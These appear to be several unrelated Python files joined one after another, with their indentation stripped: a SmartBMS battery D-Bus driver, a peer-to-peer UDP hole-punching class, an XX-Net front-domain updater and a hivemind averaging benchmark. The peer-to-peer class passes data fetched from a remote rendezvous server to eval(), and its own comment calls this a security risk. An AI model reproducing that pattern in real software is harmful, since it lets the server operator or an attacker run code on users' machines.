buffer_index = 0
time.sleep(0.2)
except Exception as e:
print('Fatal exception: ')
print(e)
mainloop.quit()
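# Current fields are 3 bytes: the first byte carries the sign ('X' = no
# reading, '-' = negative), the next two bytes are an unsigned big-endian
# value in steps of 0.125 A.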
def _decode_current(self, raw_value):
if(raw_value[0] == ord('X')):
return 0
elif(raw_value[0] == ord('-')):
factor = -1
else:
factor = 1
return factor*round(0.125*struct.unpack('>H', raw_value[1:3])[0],1)
def _decode_value(self, raw_value, multiplier):
if(len(raw_value) == 3):
value = struct.unpack('>L', bytearray(b'\x00')+raw_value)[0]
else:
value = struct.unpack('>H', raw_value[0:2])[0]
return round(multiplier*value,2)
def _decode_voltage(self, raw_value):
return self._decode_value(raw_value, 0.005)
def _decode_temperature(self, raw_value):
return round(struct.unpack('>H', raw_value[0:2])[0]*0.857-232,0)
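# Worked example (illustration only): a 3-byte raw voltage of b'\x00\x28\xa0'
# is decoded by _decode_value as 0x28a0 = 10400, which _decode_voltage scales
# by 0.005 to give 52.0 V.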
class SmartBMSDbus():
def __init__(self, dev, serial_id):
self._BMS = SmartBMS(dev)
self._dev = dev
self._serial_id = serial_id
self._comm_error_shadow = False
self._current_filter = deque()
self._nominal_pack_voltage = 0
self._info = {
'name' : "123SmartBMS",
'servicename' : "smartbms",
'id' : 0,
'version' : 0.6
}
self._gettexts = {
'/ConsumedAmphours': {'gettext': '%.1FAh'},
'/System/MaxCellVoltage': {'gettext': '%.2FV'},
'/System/MinCellVoltage': {'gettext': '%.2FV'},
'/Dc/0/Voltage': {'gettext': '%.2FV'},
'/Dc/0/Current': {'gettext': '%.1FA'},
'/Dc/0/Power': {'gettext': '%.0FW'},
'/Soc': {'gettext': '%.0F%%'},
'/Capacity': {'gettext': '%.1FkWh'},
'/InstalledCapacity': {'gettext': '%.1FkWh'}
}
device_port = dev[dev.rfind('/') + 1:]
device_port_num = device_port[device_port.rfind('USB') + 3:]
self._dbusservice = VeDbusService("com.victronenergy.battery." + device_port)
# Create the management objects, as specified in the ccgx dbus-api document
self._dbusservice.add_path('/Mgmt/ProcessName', __file__)
self._dbusservice.add_path('/Mgmt/ProcessVersion', self._info['version'])
self._dbusservice.add_path('/Mgmt/Connection', ' Serial ' + dev)
# Create the basic objects
self._dbusservice.add_path('/DeviceInstance', 288+int(device_port_num))
self._dbusservice.add_path('/ProductId', self._info['id'])
self._dbusservice.add_path('/ProductName', self._info['name'])
self._dbusservice.add_path('/FirmwareVersion', self._info['version'])
self._dbusservice.add_path('/HardwareVersion', None)
self._dbusservice.add_path('/Serial', self._serial_id)
self._dbusservice.add_path('/Connected', 1)
# Create device list
self._dbusservice.add_path('/Devices/0/DeviceInstance', 0x288+int(device_port_num))
self._dbusservice.add_path('/Devices/0/FirmwareVersion', self._info['version'])
self._dbusservice.add_path('/Devices/0/ProductId', self._info['id'])
self._dbusservice.add_path('/Devices/0/ProductName', self._info['name'])
self._dbusservice.add_path('/Devices/0/ServiceName', self._info['servicename'])
self._dbusservice.add_path('/Devices/0/VregLink', "(API)")
# Create the bms paths
self._dbusservice.add_path('/TimeToGo', None)
self._dbusservice.add_path('/SystemSwitch', None)
self._dbusservice.add_path('/Dc/0/Temperature', None)
self._dbusservice.add_path('/Io/AllowToCharge', None)
self._dbusservice.add_path('/Io/AllowToDischarge', None)
self._dbusservice.add_path('/Info/UpdateTimestamp', None)
#self._dbusservice.add_path('/Voltages/Cell1', None)
#self._dbusservice.add_path('/Voltages/Cell2', None)
self._dbusservice.add_path('/System/MinVoltageCellId', None)
self._dbusservice.add_path('/System/MaxVoltageCellId', None)
self._dbusservice.add_path('/System/MinCellTemperature', None)
self._dbusservice.add_path('/System/MinTemperatureCellId', None)
self._dbusservice.add_path('/System/MaxCellTemperature', None)
self._dbusservice.add_path('/System/MaxTemperatureCellId', None)
self._dbusservice.add_path('/System/NrOfModulesOnline', None)
self._dbusservice.add_path('/System/NrOfModulesOffline', None)
self._dbusservice.add_path('/System/NrOfModulesBlockingCharge', None)
self._dbusservice.add_path('/System/NrOfModulesBlockingDischarge', None)
self._dbusservice.add_path('/Alarms/LowVoltage', None)
self._dbusservice.add_path('/Alarms/HighVoltage', None)
self._dbusservice.add_path('/Alarms/LowTemperature', None)
self._dbusservice.add_path('/Alarms/HighTemperature', None)
# Register paths with custom texts
for path in self._gettexts.keys():
self._dbusservice.add_path(path, value=None, gettextcallback=self._gettext)
# Register persistent settings
self._settings_register()
# Register paths which can be externally changed, for example via the GUI
self._dbusservice.add_path('/CustomName', value=self._settings['CustomName'], writeable=True, onchangecallback=self._settext)
def update(self):
# The BMS data readout and variable writing happens on a different thread -> lock before
self._BMS.lock.acquire()
if(self._BMS.alarm_cell_communication or self._BMS.alarm_serial_communication):
self._dbusservice["/Soc"] = None
self._dbusservice["/SystemSwitch"] = None
self._dbusservice["/ConsumedAmphours"] = None
self._dbusservice["/Capacity"] = None
self._dbusservice["/InstalledCapacity"] = None
self._dbusservice['/TimeToGo'] = None
self._dbusservice["/Dc/0/Voltage"] = None
self._dbusservice["/Dc/0/Current"] =None
self._dbusservice["/Dc/0/Power"] = None
self._dbusservice["/Dc/0/Temperature"] = None
self._dbusservice["/Io/AllowToCharge"] = None
self._dbusservice["/Io/AllowToDischarge"] = None
self._dbusservice["/System/MinCellVoltage"] = None
self._dbusservice["/System/MinVoltageCellId"] = None
self._dbusservice["/System/MaxCellVoltage"] = None
self._dbusservice["/System/MaxVoltageCellId"] = None
self._dbusservice["/System/MinCellTemperature"] = None
self._dbusservice["/System/MinTemperatureCellId"] = None
self._dbusservice["/System/MaxCellTemperature"] = None
self._dbusservice["/System/MaxTemperatureCellId"] = None
self._dbusservice["/System/NrOfModulesOnline"] = 0
self._dbusservice["/System/NrOfModulesOffline"] = 1
self._dbusservice["/System/NrOfModulesBlockingCharge"] = None
self._dbusservice["/System/NrOfModulesBlockingDischarge"] = None
self._dbusservice["/Alarms/LowVoltage"] = None
self._dbusservice["/Alarms/HighVoltage"] = None
self._dbusservice["/Alarms/LowTemperature"] = None
self._dbusservice["/Alarms/HighTemperature"] = None
else:
self._dbusservice["/Soc"] = self._BMS.soc
self._dbusservice["/SystemSwitch"] = 1
self._dbusservice["/Capacity"] = self._BMS.capacity
self._dbusservice["/InstalledCapacity"] = self._BMS.capacity
self._dbusservice["/Dc/0/Voltage"] = self._BMS.pack_voltage
self._dbusservice["/Dc/0/Current"] = self._BMS.pack_current
self._dbusservice["/Dc/0/Power"] = self._BMS.pack_voltage * self._BMS.pack_current
self._dbusservice["/Dc/0/Temperature"] = self._BMS.highest_cell_temperature
self._dbusservice["/Io/AllowToCharge"] = int(self._BMS.allowed_to_charge)
self._dbusservice["/Io/AllowToDischarge"] = int(self._BMS.allowed_to_discharge)
self._dbusservice["/System/MinCellVoltage"] = self._BMS.lowest_cell_voltage
self._dbusservice["/System/MinVoltageCellId"] = self._BMS.lowest_cell_voltage_num
self._dbusservice["/System/MaxCellVoltage"] = self._BMS.highest_cell_voltage
self._dbusservice["/System/MaxVoltageCellId"] = self._BMS.highest_cell_voltage_num
self._dbusservice["/System/MinCellTemperature"] = self._BMS.lowest_cell_temperature
self._dbusservice["/System/MinTemperatureCellId"] = self._BMS.lowest_cell_temperature_num
self._dbusservice["/System/MaxCellTemperature"] = self._BMS.highest_cell_temperature
self._dbusservice["/System/MaxTemperatureCellId"] = self._BMS.highest_cell_temperature_num
self._dbusservice["/System/NrOfModulesOnline"] = 1
self._dbusservice["/System/NrOfModulesOffline"] = 0
self._dbusservice["/System/NrOfModulesBlockingCharge"] = int(not self._BMS.allowed_to_charge)
self._dbusservice["/System/NrOfModulesBlockingDischarge"] = int(not self._BMS.allowed_to_discharge)
self._dbusservice["/Alarms/LowVoltage"] = int(self._BMS.alarm_minimum_voltage)
self._dbusservice["/Alarms/HighVoltage"] = int(self._BMS.alarm_maximum_voltage)
self._dbusservice["/Alarms/LowTemperature"] = int(self._BMS.alarm_minimum_temperature)
self._dbusservice["/Alarms/HighTemperature"] = int(self._BMS.alarm_maximum_temperature)
nominal_pack_voltage = self._BMS.determine_nominal_voltage()*self._BMS.cell_count
# If no nominal pack voltage could be determined, just use current pack voltage
if(nominal_pack_voltage == 0): nominal_pack_voltage = self._BMS.pack_voltage
consumed_amp_hours = round(-1*(self._BMS.capacity*1000-self._BMS.energy_stored)/nominal_pack_voltage,1)
if(abs(consumed_amp_hours) < 0.1): consumed_amp_hours = 0 # Convert negative zero / rounding noise to zero
self._dbusservice["/ConsumedAmphours"] = consumed_amp_hours
# Filter current with a 3 minute moving average filter to stabilize the time-to-go
if(len(self._current_filter) >= 180):
self._current_filter.popleft()
self._current_filter.append(self._BMS.pack_current)
current_filter_sum = 0
for value in self._current_filter:
current_filter_sum += value
current_filter_average = current_filter_sum/len(self._current_filter)
if current_filter_average < 0:
self._dbusservice['/TimeToGo'] = (self._BMS.soc*self._BMS.capacity * 10) * 60 * 60 / (self._BMS.pack_voltage * -1 * current_filter_average)
else:
self._dbusservice['/TimeToGo'] = None
if(self._BMS.alarm_serial_communication and not self._comm_error_shadow):
self._comm_error_shadow = True
print('Serial comm error')
if(not self._BMS.alarm_serial_communication and self._comm_error_shadow):
self._comm_error_shadow = False
print('Serial comm restored')
self._BMS.lock.release()
def _settext(self, path, value): # Currently only used for CustomName
self._settings['CustomName'] = value
return True
def _gettext(self, path, value):
item = self._gettexts.get(path)
if item is not None:
return item['gettext'] % value
return str(value)
# Currently nothing has to be done with the saved setting
def _handle_setting_changed(self, setting, oldvalue, newvalue):
return True
def _settings_register(self):
# Load all persistent data
self._settings = SettingsDevice(
dbus.SessionBus() if 'DBUS_SESSION_BUS_ADDRESS' in os.environ else dbus.SystemBus(),
supportedSettings={
'CustomName': ['/Settings/123electric/Products/'+ self._serial_id + '/CustomName', self._info['name'], 0, 0]
},
eventCallback = self._handle_setting_changed)
# Called on a one second timer
def handle_timer_tick():
smartbms_dbus.update()
return True # keep timer running
if __name__ == "__main__":
# Have a mainloop, so we can send/receive asynchronous calls to and from dbus
print('123\\SmartBMS to dbus started')
DBusGMainLoop(set_as_default=True)
parser = argparse.ArgumentParser(description = '123SmartBMS to dbus')
requiredArguments = parser.add_argument_group('required arguments')
requiredArguments.add_argument('-d', '--device', help='serial device for data (eg /dev/ttyUSB0)', required=True)
args = parser.parse_args()
dev_objects = serial.tools.list_ports.comports()
device_serial_numbers = {}
for d in dev_objects:
device_serial_numbers[d.device] = d.serial_number
smartbms_dbus = SmartBMSDbus(args.device, device_serial_numbers[args.device])
time.sleep(3) # Wait until we have received some data
GLib.timeout_add(1000, lambda: ve_utils.exit_on_error(handle_timer_tick))
mainloop = GLib.MainLoop()
mainloop.run()
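# Example invocation (assumption: the BMS is connected on /dev/ttyUSB0):
#   python3 smartbms.py -d /dev/ttyUSB0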
|
P2PUDPSocket.py
|
import sys
import socket as sk
import urllib.parse
import urllib.request
import time
import threading
try:
import stun
except ImportError:
print('Install stun with')
print('pip install pystun3')
sys.exit(1)
# Public STUN hosts can be found by searching online; see for example:
# https://gist.github.com/sagivo/3a4b2f2c7ac6e1b5267c2f1f59ac6c6b
class P2PUDPSocket:
get_url = 'https://psycox3.pythonanywhere.com/getall'
clear_url = 'https://psycox3.pythonanywhere.com/clear'
add_url = 'https://psycox3.pythonanywhere.com/addinfo'
DEINIT = 0
CONNECTING = 1
CONNECTED = 2
def __init__(self, me, other, logger, local_port=65432, stun_host='stun.l.google.com', stun_port=19302):
self.me = me
self.other = other
self.logger = logger
self.stun_host = stun_host
self.stun_port = stun_port
self.lport = local_port
self.lhost = '0.0.0.0'
self.eip = None
self.eport = None
self.ss = None
self.oip = None
self.oport = None
self.recvTh = None
self.termRecvTh = False
self.state = P2PUDPSocket.DEINIT
def connect(self):
nat_type, eip, eport = stun.get_ip_info(source_ip=self.lhost, source_port=self.lport,
stun_host=self.stun_host, stun_port=self.stun_port)
#print(type(self.logger))
self.logger(f'{nat_type}')
self.logger(f'({self.lhost}, {self.lport}) -> ({eip}, {eport})')
if eport is None:
self.logger(f'Unable to find external Port')
return None
self.eip = eip
self.eport = eport
self.ss = sk.socket(sk.AF_INET, sk.SOCK_DGRAM)
self.ss.setsockopt(sk.SOL_SOCKET, sk.SO_REUSEADDR, 1)
self.ss.bind((self.lhost, self.lport))
self.clearServerCache()
availClients = {}
while self.other not in availClients:
self.SendKeepAlive()
self.UpdateInfo()
time.sleep(1)
availClients = self.getAvailClients()
self.oip, self.oport = availClients[self.other]
try:
self.oport = int(self.oport)
except (TypeError, ValueError):
self.logger(f'Invalid port {self.oport} for {self.other}')
return None
self.logger(f'Starting recv thread')
self.startRecv()
self.logger(f'Trying to connect to ({self.oip}, {self.oport})')
counter = 0
while counter < 6:
msg = f'{self.me} says HELLO {counter}'.encode()
self.logger(f"Sending {msg}")
self.ss.sendto(msg, (self.oip, self.oport))
#data, addr = self.ss.recvfrom(1024)
#self.logger(f'From: {addr} -> {data.decode()}')
counter = counter + 1
time.sleep(1)
self.logger('Exiting')
def __recvLoop(self):
helo_msg = f'{self.other} says HELLO '
while self.termRecvTh:
data, addr = self.ss.recvfrom(1024)
data = data.decode()
self.logger(f'From: {addr} -> {data}')
if data.startswith(helo_msg):
self.state = P2PUDPSocket.CONNECTED
def startRecv(self):
self.recvTh = threading.Thread(target=self.__recvLoop, daemon=True)
self.termRecvTh = True
self.recvTh.start()
def clearServerCache(self):
r = urllib.request.urlopen(P2PUDPSocket.clear_url)
def getAvailClients(self):
r = urllib.request.urlopen(P2PUDPSocket.get_url)
data = r.read().decode()
self.logger(f'clients -> {data}')
# TODO: avoid eval here; it is a security risk.
return eval(data)
def UpdateInfo(self):
data = urllib.parse.urlencode({'name': self.me, 'port': str(self.lport)})
data = data.encode('ascii')
#add_url = 'https://psycox3.pythonanywhere.com/addinfo'
res = urllib.request.urlopen(P2PUDPSocket.add_url, data)
self.logger(res.read().decode())
def SendKeepAlive(self):
self.ss.sendto('loopback Keep-Alive'.encode(), (self.eip, self.eport))
data, addr = self.ss.recvfrom(1024)
self.logger(f'From: {addr} -> {data.decode()}')
def sendBytes(self, data: bytes):
self.ss.sendto(data, (self.oip, self.oport))
print(f'Sending {data} to', (self.oip, self.oport))
def disconnect(self):
self.termRecvTh = False
# self.recvTh.join()
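# Minimal usage sketch (assumption: a second peer runs the same code with the
# me/other names swapped and the rendezvous URLs above are reachable):
#
#   peer = P2PUDPSocket(me='alice', other='bob', logger=print, local_port=65432)
#   peer.connect()            # register via the rendezvous server, then hole-punch
#   peer.sendBytes(b'hello')  # datagrams now go directly to the other peer
#   peer.disconnect()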
|
host_manager.py
|
import random
import os
import json
import time
import threading
import simple_http_client
from front_base.host_manager import HostManagerBase
class HostManager(HostManagerBase):
def __init__(self, config, logger, default_fn, fn, front):
self.config = config
self.logger = logger
self.default_fn = default_fn
self.fn = fn
self.front = front
self.load()
if self.config.update_domains:
threading.Thread(target=self.update_front_domains).start()
def load(self):
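# The host files are expected to map a top domain to a list of SNI subdomains
# (assumption inferred from the parsing below), e.g.
#   {"example.com": ["a.example.com", "b.example.com"]}
# self.ns then becomes a list of [top_domain, [subdomains]] pairs.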
for fn in [self.fn, self.default_fn]:
if not os.path.isfile(fn):
continue
lns = []
try:
with open(fn, "r") as fd:
ds = json.load(fd)
for top in ds:
subs = ds[top]
subs = [str(s) for s in subs]
lns.append([str(top), subs])
self.ns = lns
self.logger.info("load %s success", fn)
return True
except Exception as e:
self.logger.warn("load %s for host fail.", fn)
def get_sni_host(self, ip):
top_domain, subs = random.choice(self.ns)
sni = random.choice(subs)
return sni, top_domain
def update_front_domains(self):
next_update_time = time.time()
while self.front.running:
if time.time() < next_update_time:
time.sleep(4)
continue
try:
timeout = 30
if self.config.PROXY_ENABLE:
client = simple_http_client.Client(proxy={
"type": self.config.PROXY_TYPE,
"host": self.config.PROXY_HOST,
"port": self.config.PROXY_PORT,
"user": self.config.PROXY_USER,
"pass": self.config.PROXY_PASSWD,
}, timeout=timeout)
else:
client = simple_http_client.Client(timeout=timeout)
url = "https://raw.githubusercontent.com/XX-net/XX-Net/master/code/default/x_tunnel/local/cloudflare_front/front_domains.json"
response = client.request("GET", url)
if not response or response.status != 200:
if response:
self.logger.warn("update front domains fail:%d", response.status)
next_update_time = time.time() + (1800)
continue
content = response.text
if isinstance(content, memoryview):
content = content.tobytes()
need_update = True
front_domains_fn = self.fn
if os.path.exists(front_domains_fn):
with open(front_domains_fn, "r") as fd:
old_content = fd.read()
if content == old_content:
need_update = False
if need_update:
with open(front_domains_fn, "w") as fd:
fd.write(content)
self.load()
self.logger.info("updated cloudflare front domains from github.")
next_update_time = time.time() + (4 * 3600)
except Exception as e:
next_update_time = time.time() + (1800)
self.logger.exception("updated cloudflare front domains from github fail:%r", e)
|
benchmark_averaging.py
|
import math
import time
import threading
import argparse
import torch
import hivemind
from hivemind.utils import LOCALHOST, increase_file_limit, get_logger
from hivemind.proto import runtime_pb2
logger = get_logger(__name__)
def sample_tensors(hid_size, num_layers):
tensors = []
for i in range(num_layers):
tensors.append(torch.randn(hid_size, 3 * hid_size))
tensors.append(torch.randn(3 * hid_size))
tensors.append(torch.randn(3 * hid_size))
tensors.append(torch.randn(hid_size, hid_size))
tensors.append(torch.ones(hid_size))
tensors.append(torch.zeros(hid_size))
tensors.append(torch.randn(hid_size, 4 * hid_size))
tensors.append(torch.randn(4 * hid_size))
tensors.append(torch.ones(4 * hid_size))
tensors.append(torch.randn(2, hid_size, hid_size, 2))
tensors.append(torch.randn(hid_size))
tensors.append(torch.randn(hid_size))
tensors.append(torch.randn(hid_size))
return tuple(tensors)
def benchmark_averaging(num_peers: int, target_group_size: int, num_rounds: int,
averaging_expiration: float, request_timeout: float, round_timeout: float,
hid_size: int, num_layers: int, spawn_dtime: float):
dht_root = hivemind.DHT(listen_on=f'{LOCALHOST}:*', start=True)
num_groups = 2 ** int(round(math.log2(num_peers / target_group_size)))
nbits = int(round(math.log2(num_groups)))
peer_tensors = [sample_tensors(hid_size, num_layers)
for _ in range(num_peers)]
processes = {dht_root}
lock_stats = threading.Lock()
successful_steps = total_steps = 0
def run_averager(index):
nonlocal successful_steps, total_steps, lock_stats
dht = hivemind.DHT(listen_on=f'{LOCALHOST}:*',
initial_peers=[f"{LOCALHOST}:{dht_root.port}"],
start=True)
initial_bits = bin(index % num_groups)[2:].rjust(nbits, '0')
averager = hivemind.DecentralizedAverager(
peer_tensors[index], dht, prefix='my_tensor', initial_group_bits=initial_bits, listen_on=f"{LOCALHOST}:*",
compression_type=runtime_pb2.CompressionType.FLOAT16, target_group_size=target_group_size,
averaging_expiration=averaging_expiration, request_timeout=request_timeout, start=True)
processes.update({dht, averager})
logger.info(f'Averager {index}: started on endpoint {averager.endpoint}, group_bits: {averager.get_group_bits()}')
for step in range(num_rounds):
try:
success = averager.step(timeout=round_timeout) is not None
except Exception:
success = False
with lock_stats:
successful_steps += int(success)
total_steps += 1
logger.info(f"Averager {index}: {'finished' if success else 'failed'} step {step}")
logger.info(f"Averager {index}: done.")
threads = []
for i in range(num_peers):
thread = threading.Thread(target=run_averager, args=[i])
threads.append(thread)
thread.start()
time.sleep(spawn_dtime)
t = time.time()
for thread in threads:
thread.join()
logger.info(f"Benchmark finished in {time.time() - t:.3f} seconds.")
logger.info(f"Success rate: {successful_steps / total_steps} ({successful_steps} out of {total_steps} attempts)")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--num_peers', type=int, default=16, required=False)
parser.add_argument('--target_group_size', type=int, default=4, required=False)
parser.add_argument('--num_rounds', type=int, default=5, required=False)
parser.add_argument('--hid_size', type=int, default=256, required=False)
parser.add_argument('--num_layers', type=int, default=3, required=False)
parser.add_argument('--averaging_expiration', type=float, default=5, required=False)
parser.add_argument('--round_timeout', type=float, default=15, required=False)
parser.add_argument('--request_timeout', type=float, default=1, required=False)
parser.add_argument('--spawn_dtime', type=float, default=0.1, required=False)
parser.add_argument('--increase_file_limit', action="store_true")
args = vars(parser.parse_args())
if args.pop('increase_file_limit', False):
increase_file_limit()
benchmark_averaging(**args)
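# Example invocation (assumption):
#   python benchmark_averaging.py --num_peers 16 --target_group_size 4 --num_rounds 5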